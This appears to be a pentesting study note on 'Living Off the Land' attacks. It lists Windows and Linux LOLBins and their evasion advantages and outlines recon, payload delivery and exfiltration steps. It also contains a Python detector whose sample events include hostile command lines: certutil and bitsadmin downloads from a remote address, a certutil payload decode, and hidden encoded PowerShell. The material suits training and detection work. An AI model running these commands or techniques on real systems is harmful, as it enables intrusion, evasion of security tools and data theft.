#post-exploitation #evasion #lolbins #red-team #pentesting

1. Core Definition: The “Native Arsenal”

“Living Off the Land” (LotL) is an attack strategy where an adversary uses native, pre-installed tools and features within the target’s operating system to carry out their objectives, rather than dropping custom malware or external hacking tools onto the system.

The binaries used in these attacks are commonly referred to as LOLBins (Living Off the Land Binaries) or LOLScripts. Because these tools are legitimate system utilities (often used by system administrators), their execution is generally trusted by the OS and security controls.

2. Why LotL is Effective (The Evasion Advantage)

From an offensive perspective, LotL is primarily about evasion and blending in:

  • Bypassing AV/EDR: Traditional Antivirus (AV) relies heavily on file hashes and signatures. Since LOLBins are digitally signed by Microsoft or Apple (or are standard Linux utilities), they will not trigger signature-based alerts.

  • Blending with Noise: System administrators use tools like PowerShell, WMI, or SSH daily. An attacker using these same tools hides their malicious actions within the normal operational baseline of the network.

  • Reduced Artifacts: By not dropping executables to the disk (fileless malware), attackers leave a much smaller forensic footprint for incident responders to analyze.

3. Common LOLBins by Operating System

Knowing which native tools to leverage is critical for post-exploitation.

Windows (The Most Documented)

  • certutil.exe: A command-line program installed as part of Certificate Services. Attackers frequently abuse it to download files from remote URLs or decode Base64-encoded payloads directly on the endpoint.

  • bitsadmin.exe: Used by Windows to manage background transfer (BITS) jobs such as update downloads. It can be abused to download malicious payloads in the background, bypassing many proxy restrictions.

  • regsvr32.exe / rundll32.exe: Used to register and execute OLE controls or DLLs. Attackers use these to execute malicious code (often hosted remotely) while hiding behind a trusted Microsoft binary.

  • wmic.exe (WMI): Windows Management Instrumentation is a powerful administrative framework. It is heavily abused for lateral movement, remote execution, and establishing persistence.

  • powershell.exe: The classic LotL tool. While modern EDRs heavily monitor PowerShell, it remains a potent tool for memory-level execution, reconnaissance, and data manipulation.
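The flip side of the list above is what a defender looks for: a trusted binary is not suspicious by itself, but its command line and parent process usually are. The following added example (not part of the original note) runs a small set of rules over constructed Sysmon-style process-creation events for the Windows LOLBins listed above; the parent-process set and the sample command lines are assumptions made for the illustration.

```python
import re
from typing import List, Tuple

# Windows LOLBins named in the note, matched on the image file name.
LOLBINS = {"certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe",
           "wmic.exe", "powershell.exe"}
# Assumption: parents that rarely have a legitimate reason to launch admin tooling.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "msedge.exe", "chrome.exe"}

URL_RE = re.compile(r"https?://", re.I)                            # remote download / remote code
ENCODED_RE = re.compile(r"\s-e(?:ncodedcommand|nc|c)?\s", re.I)    # PowerShell -e/-ec/-enc/-EncodedCommand
DECODE_RE = re.compile(r"\s-decode(?:hex)?\s", re.I)               # certutil decoding a Base64/hex blob

def classify(parent: str, image: str, cmdline: str) -> List[str]:
    """Return the reasons this process-creation event looks like LOLBin abuse (empty list = benign)."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name not in LOLBINS:
        return []
    reasons = []
    if URL_RE.search(cmdline):
        reasons.append("remote URL on command line")
    if name == "certutil.exe" and DECODE_RE.search(cmdline):
        reasons.append("certutil decoding a payload")
    if name == "powershell.exe" and ENCODED_RE.search(cmdline):
        reasons.append("encoded PowerShell command")
    if parent.lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent.lower()}")
    return reasons

def scan(events: List[Tuple[str, str, str]]) -> List[Tuple[str, List[str]]]:
    """Run classify() over (parent, image, command_line) events; keep only the hits."""
    hits = []
    for parent, image, cmdline in events:
        reasons = classify(parent, image, cmdline)
        if reasons:
            hits.append((cmdline, reasons))
    return hits

# Constructed sample events (203.0.113.0/24 is a documentation range, BASE64BLOB is a placeholder).
SAMPLE_EVENTS = [
    ("cmd.exe", r"C:\Windows\System32\certutil.exe", r"certutil.exe -urlcache -f http://203.0.113.5/stage.txt C:\Users\Public\stage.txt"),
    ("cmd.exe", r"C:\Windows\System32\certutil.exe", r"certutil.exe -decode C:\Users\Public\stage.txt C:\Users\Public\stage.bin"),
    ("services.exe", r"C:\Windows\System32\certutil.exe", r"certutil.exe -verify C:\certs\server.cer"),   # routine admin use
    ("winword.exe", r"C:\Windows\System32\bitsadmin.exe", r"bitsadmin.exe /transfer job /download /priority normal http://203.0.113.5/a.dat C:\Users\Public\a.dat"),
    ("svchost.exe", r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\Program Files\Vendor\control.ocx"),   # local registration
    ("winword.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -NoP -W Hidden -enc BASE64BLOB"),
]

if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(f"ALERT: {cmdline}\n    -> {', '.join(reasons)}")
```

Of the six constructed events, four alert and the two routine ones (certificate verification, local OCX registration) stay silent, which is the point: alert on context, not on the binary name.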

Linux / Unix

  • python / perl / ruby: Often installed by default. Can be used to spawn fully interactive reverse shells or execute complex scripts without bringing in compiled binaries.

  • cron: The standard Linux task scheduler, heavily abused for establishing stealthy persistence.

  • wget / curl: Standard web request tools used to download payloads or exfiltrate data.

  • find / awk / tar: Used for local privilege escalation (if SUID bits are misconfigured) or staging/compressing data prior to exfiltration.

4. Pentesting Focus Areas: The LotL Attack Lifecycle

When conducting an engagement, you can leverage LotL across multiple phases:

A. Reconnaissance & Discovery

Instead of running Nmap or BloodHound immediately, use native commands to map the environment quietly.

  • Commands: netstat (active connections), arp -a (neighboring hosts), nltest (domain trust mapping), whoami /groups (current privileges).

B. Execution & Payload Delivery

Download and execute payloads entirely in memory to avoid writing to disk.

  • Technique: Using certutil to pull a Base64-encoded payload, decoding it locally, and injecting it into a running process using standard Windows APIs.

C. Exfiltration

Tying into DLP evasion, use native tools to move data out of the network.

  • Technique: Compressing sensitive files using native Compress-Archive in PowerShell, then sending the data out via Invoke-WebRequest to an attacker-controlled API endpoint.